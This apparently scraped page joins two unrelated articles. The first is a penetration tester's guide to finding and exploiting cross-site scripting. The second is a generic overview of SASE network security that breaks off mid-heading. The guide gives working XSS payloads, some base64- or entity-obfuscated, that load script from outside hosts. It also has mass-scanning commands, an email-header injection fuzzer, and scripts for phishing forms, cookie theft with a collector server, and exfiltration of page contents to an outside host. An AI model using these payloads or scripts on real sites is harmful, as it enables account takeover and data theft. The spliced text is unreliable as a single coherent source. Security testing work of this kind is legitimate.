javascript:eval('var a=document.createElement(\'script\');a.src=\'https://crimson.xss.ht\';document.body.appendChild(a)')
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY3JpbXNvbi54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY3JpbXNvbi54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY3JpbXNvbi54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//crimson.xss.ht");a.send();</script>
<script>$.getScript("//crimson.xss.ht")</script>
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;crimson.xss.ht&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">

Lines 5, 6, and 7 contain a Base64-encoded payload in the id value.
The decoded payload is shown below:

var a=document.createElement("script");a.src="https://crimson.xss.ht";document.body.appendChild(a);
  • single-char — wordlist for checking how the application handles some special characters, 1500 payloads (contains the below list).
  • special_chars.txt — minimalistic wordlist with special characters.

PRIVATE XSSHUNTER

The Burp Collaborator is, in most cases, enough to check for Blind XSS vulnerabilities that are triggered instantly, but sometimes the payload is triggered only after a few hours. For this scenario, having a self-hosted XSS Hunter Express container on a VPS is good for tracking them.

GUIDELINES

In the below guidelines, I assume that you identified the application entry points described in my previous article.

It would be best to use Paramalyzer to gather all reflected values.

Just to remind you: XSS can be injected into HTML input fields, but it may also exist in HTTP headers like Cookie or User-Agent, if their values are displayed on the page or processed by some engines that you cannot see.
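For instance, seeding such header-based payloads is a few lines with Python requests (the callback host below is a placeholder for your Collaborator or XSS Hunter domain):

import requests

payload = '"><script src=https://collab.example></script>'  # placeholder callback host

# Headers like User-Agent or Referer are often rendered later in admin
# panels or log viewers, out of the tester's sight
headers = {"User-Agent": payload, "Referer": payload}
r = requests.get("https://target.example/", headers=headers)
print(r.status_code)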

I. STARTING FROM THE BOTTOM — HTML INJECTION

Use simple HTML injection payloads first, like <h1>, <s>, <b>, <img src=x>.

Source: Own study — The example HTML injection

Sometimes it will not be possible to escalate the HTML injection to an XSS vulnerability. This commonly happens when testing application functionalities that send mails containing partial user content vulnerable to HTML injection, for instance the username value.

II. TESTING POLYGLOTS

Inject XSS polyglot payloads that fit in many contexts.

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/test.jpg">
" onclick=alert(1)//<buttononclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`

To be efficient during manual testing, use polyglots which can fit in many HTML contexts. If you need more polyglots, visit this link.

III. TESTING SANITIZATION & MISHANDLING OF SPECIAL CHARS

Check how the target handles special characters.

  • Use a special_chars.txt — a minimalistic list (420 payloads) containing the characters shown below in multiple encodings:

You can also inject them in a single line to save time, but it will be harder to track which of the special characters is mishandled.

!"#$%&'()*+,-./:;<=>?@[\]^_`{|}\n\r
  • If you have more time to spare, use Crimson single-char — this list contains many special chars with multiple encodings (1500 payloads).

After checking how the target handles special characters, you will know whether it is possible to use payloads with, for instance, HTML entities, and you can widen the attack surface, because some special character may trigger an error in the application which reflects your payloads.
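If you want to roll your own quick probe list in the same spirit, a few lines of Python can emit each character in several encodings (a homemade stand-in for the wordlists above, not their actual generator):

from urllib.parse import quote

chars = "!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}"
for c in chars:
    # raw, URL-encoded, double-URL-encoded, and HTML-entity variants
    print("\t".join([c, quote(c), quote(quote(c)), f"&#{ord(c)};"]))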

IV. BREAKING THE RENDERING

Use <plaintext> to stop the page rendering and display it as plain text.

Source: Own study — breaking the rendering of the HTML using <plaintext> tag.

The alert() JavaScript function could be blocked. To identify the XSS, it is better to use tags and functions that are rarely used or less known. Another example: <script>print()</script>.

V. JUMPING INTO THE DEBUGGER

Use <script>debugger;</script> to stop the JS execution.

Source: Own study — Stopping the JS execution using the debugger; functionality.

Another way of identifying the XSS without alert(). The bonus when using debugger; is that the JS execution breaks on the vulnerable function, and it is easier to get an idea of what is wrong with the code.

VI. IDENTIFYING THE PAYLOAD

Use console.log(n) to identify payloads and observe the dev console.

Source: Own study — Identifying the payload source using console.log().

In the case of Stored XSS, or some recursive function that triggers the alert() popup window many times, it is hard to close them all. Additionally, sometimes it is hard to identify where the payload was injected. The console.log(n) can be handy in this situation.

VII. DETERMINING THE SCOPE

Use document.domain and window.origin to know the scope of the XSS.

Source: Own study — Using console.log(), document.domain, and window.origin for determining the scope.
<script>console.log("XSS from the FUNCTION_XYZ of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>

Sandboxes isolate user-uploaded HTML and JavaScript to make sure that they cannot access any user data. Use document.domain and window.origin to know in which scope the XSS is actually executing. You can also use document.cookie to check if you can access the user session cookie.

VIII. DOM INVADING WITH DOM INVADER

Use Burp Suite DOM Invader to find client-side & PostMessage XSS easily.

Finding DOM based XSS.

Source: Own study — Example identification of a DOM XSS using DOM Invader.
Source: Own study — Image shows the application's state after clicking “Exploit” in DOM Invader.

Finding PostMessage based XSS.

Source: Own study — Finding flaws in web messages using DOM Invader PostMessage interception.
Source: Own study — Exploiting web-message-based XSS from DOM Invader.
<iframe src="https://TARGET/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">
Source: Own study — Triggering the print() immediately after hitting Send button.

DOM Invader can help you find client-side & web-message XSS bugs with minimum effort. Test with the Auto fire and DOM clobbering options ON and then OFF, since they can break the application functionality.

IX. AUTOMATING THE REFLECTED & BLIND XSS TESTING

Use xssValidator to automate the Reflected & Blind XSS testing.

  • First, add the host to the scope using the Burp Suite Target tab.
Source: Own study — Checking for reflected values with Paramalyzer & sending the request for further testing.
  • After analysis, send the request to the Repeater and then to Intruder.

I do not know why there is no option for sending it straight to Intruder.

  • Add the blind payloads to the xssValidator payload lists:
Source: Own study — Adding blind payloads to the payload list in the Burp Suite xssValidator extension tab.
  • Then configure the Intruder with the xssValidator payload generator, as was shown in the Tooling section, and start the attack.
Source: Own study — The grep will mark the successful attack results.
  • Open the request in the browser to verify the vulnerability existence:
Source: Own study — Confirming successful Reflected XSS injection.

 

  • Do not forget to check the collaborator for possible Blind XSS.
 
Source: Own study — Burp Suite Collaborator HTTP interactions after injecting the Blind XSS payloads.

This way, the testing of Reflected, Blind, and some DOM XSS (where the vulnerable parameter value can be provided in the request body) can be automated to speed up the assessment.

X. AUTOMATING THE STORED XSS TESTING

Use DalFox sxss mode or Burp Suite Intruder to test for Stored XSS.

Using DalFox sxss mode for testing.

dalfox sxss TARGET_URL -X POST -d POST=DATA -p PARAM_TO_ATTACK -H "COOKIE_HEADER" --trigger VERIFY_URL
  • Additionally, you can use the below options to test only chosen parameters and omit the parameter mining to speed up the testing:
-p PARAM_TO_ATTACK --skip-mining-all
dalfox sxss "https://web-security-academy.net/post/comment" -X POST -d "csrf=jwBbTL1qqjj4185QoqQK2S7dsSi7GKPI&postId=7&comment=test&name=test&email=test%40afine.com&website=http%3A%2F%2Fafine.com" -p name,comment -H "Cookie: session=5S6Y6F93g81VMaytbjeq3Wkn2rVk9sJF" --trigger "https://web-security-academy.net/post?postId=7" --skip-mining-all -F
 
Source: Own study — The example Stored XSS testing using DalFox sxss mode.
Source: Own study — DalFox payload triggered after visiting the page.

It is recommended to first use the --proxy http://127.0.0.1:8080 option to check in Burp Suite that everything is okay, and after that restart the tool without the --proxy option to speed up the testing.

Using Burp Suite Intruder for testing.

  • First, send the request to Intruder and select the injection points.
Source: Own study — Choosing the injection points.
  • It is recommended to number your payloads to make it easier to identify which one has been triggered after the injection phase.

If you want to test with the DalFox payloads, you can use the below command to generate the numbered wordlist — around 1600 payloads:

dalfox payload --make-bulk
Source: Own study — The payloads are numbered, making it easy to find which payload was triggered.
  • Paste payloads to the Intruder and start the attack.
 
Source: Own study — Pasting the DalFox payloads into the Payload list and starting the attack.
  • After sending all payloads, visit the website and identify if any of them could be triggered.

Personally, I like the Intruder method more, but I wanted to show DalFox since it can additionally find hidden parameters, automatically confirm whether the target is vulnerable, and show the working payload without visiting the page.

XI. TESTING STORED XSS IN MULTIPLE CONTEXTS

Do not forget about the “privileged sinks”.

  1. Identify the sources from a low-privileged level account.
  2. Find their sinks available only for highly privileged accounts.
  3. Inject the payloads from the low-privileged account into the sources.
  4. Visit the sinks in a forbidden area using the privileged account.
  5. Check if any payload has been triggered.

If you are testing an application with multiple privilege levels, where there are zones that only highly privileged users have access to (for instance, an Admin Control Panel), do not forget to test these sinks.

XII. BOMB TESTING

If there is no length limit of the input, use all of the payloads at once.

Just copy-paste all of your payloads and check the results.

If you cannot use the new line character in your input field, you can do a small trick using Visual Studio Code.

wget https://raw.githubusercontent.com/payloadbox/xss-payload-list/master/Intruder/xss-payload-list.txt
code xss-payload-list.txt
Source: Own study — Removing the new line characters from the wordlist using VScode.

This method can trigger another error, which could reflect your input and be vulnerable to Cross-Site Scripting.
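If you prefer to stay in the terminal, the same newline-stripping trick is a short Python helper (a hypothetical stand-in for the editor step, assuming the wordlist downloaded above):

# Collapse the payload wordlist into a single line for "bomb" injection
with open("xss-payload-list.txt") as f:
    bomb = " ".join(line.strip() for line in f)

with open("xss-bomb.txt", "w") as f:
    f.write(bomb)
print("wrote", len(bomb), "characters to xss-bomb.txt")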

XIII. MASS TESTING

When you have a lot of URLs to test, use CLI tools and automatic scanners.

  1. Proxy all urls.txt to Burp Suite.
  2. Use the XSS profile from Burp Bounty on the proxied URLs.
  3. Use the Active Scanning on the proxied URLs.
  4. Use XSStrike on urls.txt.
  5. Use DalFox on urls.txt.
  6. Modify the URLs to remove the query strings (?all=after&the=question&mark)
  7. Use XSStrike on all modified URLs with the --path flag.
# PROXY TO BURP
httpx -http-proxy http://127.0.0.1:8080 -l urls.txt
# XSStrike
python3 xsstrike.py --seeds urls.txt -l 3 -t 100 --log-file xsstrike_queries.log --file-log-level VULN | tee -a xsstrike_all.log
# DALFOX
cat urls.txt | dalfox pipe --mass --silence --no-color -o dalfox.txt
# REMOVING QUERIES
sed -E 's/\?.*//' urls.txt | sort -u > urls_path_only.txt
# XSStrike - TESTING PATHS INJECTIONS
for url in $(cat urls_path_only.txt); do python3 xsstrike.py -u "$url" --path --log-file xsstrike_paths.log --file-log-level VULN | tee -a xsstrike_all.log; done

This way you can test for low-hanging fruit at scale.

XIV. WEBMAIL TESTING

Inject XSS payloads in mail headers and visit the webmail application.

  • First, inject the same payload in all headers to identify the working payload.
python fuzzer.py -f 'ATTACKER_MAIL' -t 'TARGET_MAIL' -s 'SMTP_SERVER' -w 'PAYLOAD_TXT'
import smtplib,sys,getopt
from email.mime.multipart import MIMEMultipart

EMAIL_HEADERS = ["From","To","Date","Subject","Body","Accept-Language","Alternate-Recipient","Autoforwarded","Autosubmitted","Bcc","Cc","Comments","Content-Identifier","Content-Return","Conversion","Conversion-With-Loss","DL-Expansion-History","Deferred-Delivery","Delivery-Date","Discarded-X400-IPMS-Extensions","Discarded-X400-MTS-Extensions","Disclose-Recipients","Disposition-Notification-Options","Disposition-Notification-To","Encoding","Encrypted","Expires","Expiry-Date","Generate-Delivery-Report","Importance","In-Reply-To","Incomplete-Copy","Keywords","Language","Latest-Delivery-Time","List-Archive","List-Help","List-ID","List-Owner","List-Post","List-Subscribe","List-Unsubscribe","Message-Context","Message-ID","Message-Type","Obsoletes","Original-Encoded-Information-Types","Original-Message-ID","Originator-Return-Address","PICS-Label","Prevent-NonDelivery-Report","Priority","Received","References","Reply-By","Reply-To","Resent-Bcc","Resent-Cc","Resent-Date","Resent-From","Resent-Message-ID","Resent-Reply-To","Resent-Sender","Resent-To","Return-Path","Sender","Sensitivity","Supersedes","X400-Content-Identifier","X400-Content-Return","X400-Content-Type","X400-MTS-Identifier","X400-Originator","X400-Received","X400-Recipients","X400-Trace"]

full_cmd_arguments = sys.argv
argument_list = full_cmd_arguments[1:]
short_options = "hf:t:w:s:"
long_options = ["help", "from", "to", "wordlist", "smtp"]
try:
    arguments, values = getopt.getopt(argument_list, short_options, long_options)
except getopt.error as err:
    sys.exit(2)

def inject_in_all_headers(me,you,payload,smtp_server):
    '''Injecting the given payload in all email header fields at once.'''
    msg = MIMEMultipart()
    msg['From'] = me
    msg['To'] = you
    for h in EMAIL_HEADERS[2:]:
        msg[h] = '%s' % payload

    s = smtplib.SMTP(smtp_server)
    s.sendmail(me, [you], msg.as_string())
    s.quit()

payloads_array = list()
for current_argument, current_value in arguments:
    if current_argument in ("-h", "--help"):
        print("USAGE: \tMTA_tester.py\n\n \t\t-h --help => Show this help \n\t\t-f --from => \"attacker@smtp.vps.com\" \n\t\t-t --to => \"victim@gmail.com\" \n\t\t-w --wordlist => oob.txt \n\t\t-s --smtp smtp.vps.com")
    if current_argument in ("-f", "--from"):
        me = current_value
    if current_argument in ("-t", "--to"):
        you = current_value
    if current_argument in ("-s", "--smtp"):
        smtp_server = current_value
    if current_argument in ("-w", "--wordlist"):
        with open(str(current_value)) as payloads:
            for payload in payloads:
                payloads_array.append(payload.rstrip('\n'))

for payload in payloads_array:
    print(payload)
    print(smtp_server)
    inject_in_all_headers(me,you,payload,smtp_server)
  • Then identify the vulnerable header.

For example, if the "><script>alert(‘xss’)</script> payload worked, use the below function to find out which header is vulnerable:

def iterate_headers(me,you,smtp_server):
    msg = MIMEMultipart()
    msg['From'] = me
    msg['To'] = you
    for h in EMAIL_HEADERS[2:]:
        payload = '"><script>alert(\''+h+'\')</script>'
        msg[h] = '%s' % payload
        s = smtplib.SMTP(smtp_server)
        s.sendmail(me, [you], msg.as_string())
        s.quit()
        print(h + ' HEADER SENT')
  • After that, prepare a proof of concept script:
def poc(me,you,payload,smtp_server):
    msg = MIMEMultipart()
    msg['From'] = me
    msg['To'] = you
    msg['POC_HEADER_CHANGE_IT'] = '%s' % payload
    s = smtplib.SMTP(smtp_server)
    s.sendmail(me, [you], msg.as_string())
    s.quit()

XV. TESTING UPLOAD FUNCTIONALITIES

Upload these files and check if any could be triggered.

The upload functionality testing will be further described in another article from the AppSec Tales series later on. However, I described one of the possible XSS scenarios in the upload functionality in my previous blog post.

 

IMPACT OF XSS

The impact may vary, depending on the context. In this section, you can find script templates that can help you create PoC in various scenarios.

  • The example XSS payload that loads the x.js file as a script source.
<script/src=https://afine.com/x.js%20/>
  • You can host it using a simple Python server:
sudo python -m http.server 80

DEFACING

Changing the page content.

  • The example x.js script content for defacing the website:
body = document.getElementsByTagName("body")[0];
body.innerHTML = "<h1>YOUR_CUSTOM_HTML_CONTENT</h1>";

PHISHING

Creating a login form for stealing the credentials.

  • The example body.innerHTML content imitating the basic phishing form:
<html>
<head>
<title>Register Page</title>
</head>
<body>
<!-- Add a logo at the top of the page -->
<center><img src="https://afine.com/logo.png" alt="Your logo" >

<h1>Register Page</h1>
<form onsubmit="sendCredentials(); return false;">
<label for="email">Email:</label><br>
<input type="text" id="email" name="email"><br>
<label for="password">Password:</label><br>
<input type="password" id="password" name="password"><br><br>
<input type="submit" value="Submit">
</form>
</center>

<script>
function sendCredentials() {
    // Get the email and password values from the form
    var email = document.getElementById("email").value;
    var password = document.getElementById("password").value;

    // Encode the email and password in base64
    var base64Credentials = btoa(email + ":" + password);

    // Send the base64-encoded credentials to the server
    var url = "https://afine.com/?creds=" + base64Credentials;
    var xhr = new XMLHttpRequest();
    xhr.open("GET", url, true);
    xhr.send();
}
</script>
</body>
</html>
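On the receiving side, the base64-encoded credentials are trivial to decode. A minimal Python sketch, with hypothetical sample credentials:

import base64

# What the phishing page computes with btoa(email + ":" + password):
creds = base64.b64encode(b"victim@example.com:hunter2").decode()

# Attacker-side decoding of the ?creds= query parameter:
email, password = base64.b64decode(creds).decode().split(":", 1)
print(email, password)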

SESSION HIJACKING

Stealing the victim's cookies.

  • The example x.js content for stealing the cookie:
new Image().src = "http://afine.com/?cc=" + encodeURIComponent(document.cookie);
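Something has to listen on the attacker's host to collect what x.js sends. A minimal Python sketch of such a listener, assuming the exfiltration URL shown above (binding port 80 requires root):

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class CookieLogger(BaseHTTPRequestHandler):
    def do_GET(self):
        # Log the "cc" query parameter sent by the payload.
        params = parse_qs(urlparse(self.path).query)
        if "cc" in params:
            print("Captured cookie:", params["cc"][0])
        self.send_response(200)
        self.end_headers()

HTTPServer(("0.0.0.0", 80), CookieLogger).serve_forever()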

SESSION RIDING

Acting in the context of the victim session.

  • The example x.js content for reading the target website body from a victim session:
function read_body(xhr) {
    var data;
    if (!xhr.responseType || xhr.responseType === "text") {
        data = xhr.responseText;
    } else if (xhr.responseType === "document") {
        data = xhr.responseXML;
    } else {
        // For "json" and other response types, the parsed result is in xhr.response
        data = xhr.response;
    }
    return data;
}

var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        // Send the URL-encoded response body to your server, using a fresh
        // XMLHttpRequest so the first one is not reused inside its own callback.
        var encodedData = read_body(xhr);
        var url = "https://afine.com/whatever.php?data=" + encodeURIComponent(encodedData);
        var exfil = new XMLHttpRequest();
        exfil.open("GET", url, true);
        exfil.send(null);
    }
};
xhr.open('GET', 'http://TARGET/to/read', true);
xhr.send(null);

If you want to perform an action in the context of the victim's session (for example, adding your low-privilege user to an administrator group), remember to minimize the request data (remove unnecessary headers, parameters, and data) and, if possible, change POST to GET so the JavaScript payload stays small.

FINAL WORDS

Are these all the possibilities? Of course not; this list is just the tip of the iceberg. However, by ticking each item off this list, you will surely not miss a simple vulnerability during the test. To learn more about the XSS topic, follow the links below:




The article was originally published at: https://karol-mazurek95.medium.com/appsec-tales-xii-xss-dd5fcc717187

Abstract:

SASE (Secure Access Service Edge) is a comprehensive solution that aims to improve the security of an organization's network by providing centralized and cloud-based security services. This solution streamlines access to resources and enhances the security of the network edge. SASE is important because it helps organizations cope with the challenges posed by the increasing complexity of a cloud-forward system that relies on a distributed workforce and SaaS services. The future of cloud security lies in SASE, which promises to provide organizations with a comprehensive and secure solution to manage their network security needs.

What is SASE?

Secure Access Service Edge (SASE) is a cutting-edge technology designed to provide enhanced network security, performance, and simplicity to organizations. The term was first introduced by the well-known research and advisory company, Gartner. SASE aims to address the increasing need for secure and streamlined network access in the face of digital transformation, edge computing, and remote work. With SASE, organizations can benefit from a flexible and scalable network that connects employees and offices across the world, regardless of their location and device. This way, organizations can keep pace with the changing needs of their digital business operations.

SASE merges Wide Area Network (WAN) capabilities and cloud-based network security services, including zero-trust network access, secure web gateways, cloud access security brokers, and firewalls-as-a-service (FWaaS). This combination offers organizations a single service provider solution to their network and security needs, reducing the number of vendors and streamlining the network access process.

What is the importance of SASE?

As companies continue to transition to cloud-based systems, they face the challenge of enhancing security while also simplifying their operations and reducing costs. The move to remote work has only intensified the demand for hybrid cloud solutions and software as a service (SaaS), making these requirements even more pressing.

One technology that has garnered significant attention in the enterprise security space is Secure Access Service Edge (SASE). This architecture offers an attractive solution by combining network components like VPN and SD-WAN with security features like Zero Trust and contextual access.

While SASE is still largely a concept or goal for most organizations, leading tech vendors such as Cisco, Zscaler, Akamai, Palo Alto Networks, and McAfee have adopted the idea and are promoting components of their products as essential for realizing SASE. Despite its allure, companies need to overcome various obstacles to make SASE a reality. The concept may sound simple in theory, but implementing it in practice requires careful planning and execution.

The core security components of SASE

  • Cloud Access Security Broker (CASB)

CASBs are responsible for performing several security functions for cloud-based services, including detecting shadow IT (unauthorized corporate systems), securing confidential data through access control, and ensuring compliance with data privacy regulations.

  • Secure Web Gateways (SWG)

SWGs play a crucial role in protecting against cyber threats and preventing data breaches by filtering out unwanted content from web traffic, blocking unauthorized user activity, and enforcing an organization's security policies. These gateways are particularly suitable for providing security for remote workforces as they can be deployed in a distributed environment.

  • Firewall-as-a-Service (FWaaS)

FWaaS refers to firewalls that are delivered as a service from the cloud, protecting cloud-based platforms, infrastructure, and applications against cyber-attacks. This service provides a set of security capabilities, including URL filtering, intrusion prevention, and uniform policy management across all network traffic.

  • Zero Trust Network Access (ZTNA)

ZTNA platforms provide enhanced security to protect against potential data breaches by locking down all internal resources, applications, and devices from public view. They require real-time verification of every user, ensuring that only authorized users have access to sensitive information.

The best reasons to switch to SASE

Secure Access Service Edge (SASE) is the future of network security and is rapidly gaining popularity among organizations. SASE is a cloud-based architecture that combines Virtual Private Network (VPN) and Software-Defined Wide Area Network (SD-WAN) functions with cloud security services such as firewalls, secure web gateways, cloud access security brokers, DNS security, data loss prevention, and zero trust network access. It provides a centralized and simplified security architecture for all users and traffic without funneling everything through a single on-premises access point. The traditional VPN approach is becoming less effective as the number of remote locations and cloud services grows. SASE addresses these challenges by offering secure data exchange without relying on a central hub for security functions. This is achieved through unified policy management based on user identities and flexible transport routes.

Here are five compelling reasons why organizations should consider switching to SASE:

  1. Transparency: SASE provides a comprehensive overview and transparent reporting, allowing organizations to detect and respond to cyber threats more efficiently.
  2. Secure network access: SASE provides secure network access from anywhere and on any device through end-to-end encryption and reliable protection on public networks.
  3. Resource savings: SASE offloads much of the network's operation to the provider, reducing effort and costs.
  4. Security policies: SASE enables organizations to define corporate policies centrally and is compatible with the Zero Trust concept. It checks devices for trustworthiness and user identities to block unauthorized access.
  5. Improved performance: Outsourcing to the cloud and simplifying the architecture can significantly increase performance as it eliminates traffic redirection to a central computing system and reduces latency.

The Adoption of Secure Access Service Edge (SASE)

Gartner, a global research and advisory firm, has predicted a 20% adoption rate of SASE capabilities by 2023. The firm believes that the demand for SASE capabilities will have a major impact on enterprise network and security architecture and change the competitive landscape of the industry.

In the coming years, the trend toward SASE adoption is expected to pick up pace and become more pressing. Further research from Palo Alto Networks and Gartner outlines the following predictions for the future of SASE:

  • By 2025, 80% of enterprises are expected to have adopted a strategy to unify their web, cloud services, and private application access through a SASE/SSE architecture, up from 20% in 2021.
  • By 2025, 65% of enterprises are expected to have consolidated their SASE components into one or two specifically partnered SASE vendors, up from 15% in 2021.
  • By 2025, 50% of SD-WAN purchases are predicted to be part of a single-vendor SASE offering, up from less than 10% in 2021.

Challenges of SASE Deployment

The implementation of SASE, or the Secure Access Service Edge, brings with it several challenges. SASE involves the integration of security services with network services, making access to SaaS and multi-cloud functions secure. It includes features found in SD-WAN deployments, such as path resiliency and redundancy, app routing, visibility and reporting, vendor-specific software-defined capabilities, and VPN.

One of the prerequisites for SASE is a virtualized network. SD-WAN, which helps virtualize networks and their operations, has already been widely adopted, but it requires the replacement of older, single-function switches and routers with new equipment. Most enterprises have virtualized a significant portion of their networks, but the more challenging part of realizing SASE is the need for a security architecture that can be fully integrated and managed like software-defined networks.

The deployment of Secure Access Service Edge (SASE) technology faces numerous challenges, one of which is the need for a unified approach to secure access, threat protection, policy management, and device management. The challenge lies in the fact that many enterprises have a disparate range of security components in place, making it difficult to integrate them into a cohesive security architecture. Another obstacle to overcome is the lack of coordination between networking and security operations in many organizations. Typically, these two functions are managed by separate departments and may not have a close working relationship. For SASE to be successfully deployed, network operations and security operations must collaborate and align their efforts. Without this collaboration, it is impossible to implement SASE, making it a major challenge in the deployment process.

The majority of enterprises currently have a collection of security products in place, which are often standalone. Some organizations have dozens or even hundreds of unique security applications running on different platforms, from data centers and cloud instances to networks, hardware endpoints, and individual apps. Even the essential VPN for secure network connections may not be compatible with all the devices and servers within an organization, and the increasing number of network options (such as 5G, WiFi 6, and broadband) adds to the compatibility challenges.

How to Approach Adopting SASE?

  • Data Protection: Ensure that there is consistency in policies and procedures for data protection both in transit and at rest. Implement access control, encryption, and segmentation of data to protect it.
  • Data Distribution Model: Consider the entire data landscape and understand where the data will be stored, as it might be stored in multiple locations.
  • Improving Efficiency: Look at current projects and determine if they need to be modified to accommodate cloud-hosted services in the next 2-4 years, backup services (whether local or cloud-based), and sensitive services.
  • Data Flow and Migration: Evaluate the current data flow within the organization's on-premises deployment and make changes to ensure a smooth flow. Have a comprehensive plan to identify how the data will move across environments to maintain its integrity.
  • Centralized Visibility and Policy Control: Have a transparent approach to documenting network users, the data they share, connections they access, access authorization, and policies for non-compliance. Focus on the entire network, not just the edge.
  • Data Segmentation: Handle security incidents at the edge and protect sensitive data residing at the data center by implementing a fool-proof approach. Keep visibility throughout the environment, not just at the edge, to keep the data protected.

The Implementation of SASE Poses Significant Integration Challenges

Contrary to what some vendors may claim while marketing their products, the reality is that implementing SASE is a substantial integration challenge. Smaller organizations may lack the necessary resources to achieve this, even if they have some components in place such as SD-WAN and cloud access gateways.

Even larger organizations face difficulties in integrating their network and security tools and cloud management products, making sure that information can be shared and managed through a single interface. Although it is possible to implement SASE without a unified control plane or a single management console, this solution is more costly in terms of the required skills, manpower, and time compared to a unified management interface. Additionally, it increases the likelihood of issues arising due to a lack of visibility when non-compatible systems are manually managed. Some network operators, such as Verizon, offer "SASE as a Service" built on top of their connectivity and security service operations. However, enterprises will still need to manage the relationship and allocate resources to ensure that the latest network and security updates are fully implemented as their business needs and infrastructure change.

For many companies, the best approach to SASE is to engage a systems integrator that can not only integrate the necessary tools but also manage the day-to-day operations of the SASE architecture implementation. However, enterprises should be aware that SASE is a constantly evolving target, with few companies having all the components in place, and those that do likely face upgrades and infrastructure changes as capabilities mature. Furthermore, service providers often have their preferred partners, which may not be compatible with the vendor products that the enterprise currently uses. Despite this, this route may still be advantageous as these operators can leverage their influence over vendor apps and their experience in making SASE effective.

Core Capabilities of the SASE Framework

The SASE (Secure Access Service Edge) framework has several essential components to ensure the secure access of a remote workforce and prevent data breaches in a business. The COVID-19 pandemic has shifted the workplace landscape, with many employees still working remotely, making it crucial for companies to have the right tools to secure their networks.

  • One of these tools is SD-WAN as a service, which enables secure access to cloud-based resources and applications. It creates a virtual high road for network traffic and distributes it across the WAN to ensure optimal performance.
  • Zero Trust Network Access (ZTNA) is another core capability of SASE that plays an important role in securing the corporate network. It requires authentication from employees before granting access to the network. After verifying their identities, ZTNA enables access but restricts their movement within the network, ensuring that only authorized users are present in the corporate network.
  • The Secure Web Gateway (SWG) and Firewall as a Service (FWaaS) are security components that monitor and scan for any unauthorized access or malware, while also distributing user-generated traffic across the cloud. On the other hand, the Cloud Access Security Broker (CASB) acts as a mediator between users and applications and monitors the data flow between them to ensure the security of confidential data and comply with data privacy regulations.

Top benefits of SASE in Cybersecurity

Traditional remote access applications are often not secure enough, lacking important security functions such as IPS, SWG, and NGFW. This leaves businesses vulnerable, and many respond by patching together multiple point solutions. However, this patchwork approach does not provide the desired level of visibility and security.

  • Security

A holistic security approach that incorporates the SASE framework can address these security failures. SASE integrates unique security features into the underlying network, including anti-malware, firewalling, IPS, and URL filtering mechanisms. This way, all cloud, mobile, and website edges receive equal protection.

The SASE network includes several routing and security features, including zero-trust network access, RBI, malware protection, firewall as a service, DNS reputation, intrusion prevention and detection, secure web access, and cloud access security broker. With the right SASE structure, businesses can be protected against cyber-attacks and detect the source of malware.

In addition to providing comprehensive security features, SASE also offers cost savings. The traditional approach of provisioning, maintaining, sourcing, and monitoring multiple point solutions can drive up enterprise Opex and Capex. With SASE, businesses can eliminate the need to deal with multiple cloud solution vendors and instead get all the solutions from a single provider. This reduces the costs associated with network maintenance, upgrades, IT staffing, patches, and appliance buying. SASE also simplifies the network by eliminating the need for virtual and physical appliances, embracing a single cloud-native solution.

  • Enhances Scalability

SASE is designed to meet the demands of real-time applications by providing high-performance network connections. Traditional VPN security methods have been hindered by security-related delays that impact application performance. To stay ahead of the competition, businesses need automated solutions that can secure connections quickly and efficiently. SASE provides these capabilities, enabling businesses to scale their network as needed.

  • Simplified Network Management

